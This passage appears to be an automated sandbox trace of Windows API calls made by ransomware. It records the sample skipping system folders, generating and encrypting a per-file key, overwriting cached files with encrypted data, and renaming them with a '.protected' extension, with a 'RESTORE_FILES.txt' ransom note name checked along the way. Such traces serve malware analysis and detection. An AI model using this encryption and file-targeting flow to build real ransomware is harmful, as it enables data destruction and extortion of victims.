(lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Windows") returned -1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files") returned -1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="Program Files (x86)") returned -1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="$Recycle.bin") returned 1 [0088.703] lstrcmpiW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="System Volume Information") returned -1 [0088.703] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.703] StrStrIW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".protected") returned 0x0 [0088.703] lstrcmpW (lpString1="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpString2="RESTORE_FILES.txt") returned -1 [0088.703] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.703] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.703] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.704] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".txt") returned 0x0 [0088.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.704] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".rar") returned 0x0 [0088.704] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0088.704] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".zip") returned 0x0 [0088.704] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ee, lpOverlapped=0x0) returned 1 [0088.714] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.714] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ee, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ee, lpOverlapped=0x0) returned 1 [0088.714] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.714] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.715] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.715] CloseHandle (hObject=0x150) returned 1 [0088.715] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected") returned 161 [0088.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.protected")) returned 1 [0088.716] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Windows") returned -1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files") returned -1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="Program Files (x86)") returned -1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="$Recycle.bin") returned 1 [0088.716] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="System Volume Information") returned -1 [0088.716] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.716] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".protected") returned 0x0 [0088.716] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpString2="RESTORE_FILES.txt") returned -1 [0088.716] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.716] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.717] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".txt") returned 0x0 [0088.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.717] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".rar") returned 0x0 [0088.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0088.717] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".zip") returned 0x0 [0088.717] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.722] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.722] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.722] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.723] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.723] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.723] CloseHandle (hObject=0x150) returned 1 [0088.723] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected") returned 161 [0088.723] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.protected")) returned 1 [0088.728] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Windows") returned -1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files") returned -1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="Program Files (x86)") returned -1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="$Recycle.bin") returned 1 [0088.728] lstrcmpiW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="System Volume Information") returned -1 [0088.728] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.728] StrStrIW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".protected") returned 0x0 [0088.728] lstrcmpW (lpString1="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpString2="RESTORE_FILES.txt") returned -1 [0088.728] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.729] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.730] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".txt") returned 0x0 [0088.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.730] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".rar") returned 0x0 [0088.730] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8") returned 151 [0088.730] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8", lpSrch=".zip") returned 0x0 [0088.730] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.737] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.737] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x652, lpOverlapped=0x0) returned 1 [0088.738] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.738] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.738] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.738] CloseHandle (hObject=0x150) returned 1 [0088.738] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected") returned 161 [0088.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.protected")) returned 1 [0088.739] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Windows") returned -1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files") returned -1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="Program Files (x86)") returned -1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="$Recycle.bin") returned 1 [0088.739] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="System Volume Information") returned -1 [0088.739] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.739] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".protected") returned 0x0 [0088.739] lstrcmpW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpString2="RESTORE_FILES.txt") returned -1 [0088.739] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.740] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.740] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".txt") returned 0x0 [0088.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.740] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".rar") returned 0x0 [0088.740] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 151 [0088.741] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".zip") returned 0x0 [0088.741] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.742] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.742] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.742] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.742] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.742] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.743] CloseHandle (hObject=0x150) returned 1 [0088.746] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected") returned 161 [0088.746] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.protected")) returned 1 [0088.747] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Windows") returned -1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files") returned -1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="Program Files (x86)") returned -1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="$Recycle.bin") returned 1 [0088.747] lstrcmpiW (lpString1="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpString2="System Volume Information") returned -1 [0088.747] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 151 [0088.747] StrStrIW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".protected") returned 0x0 [0088.747] lstrcmpW 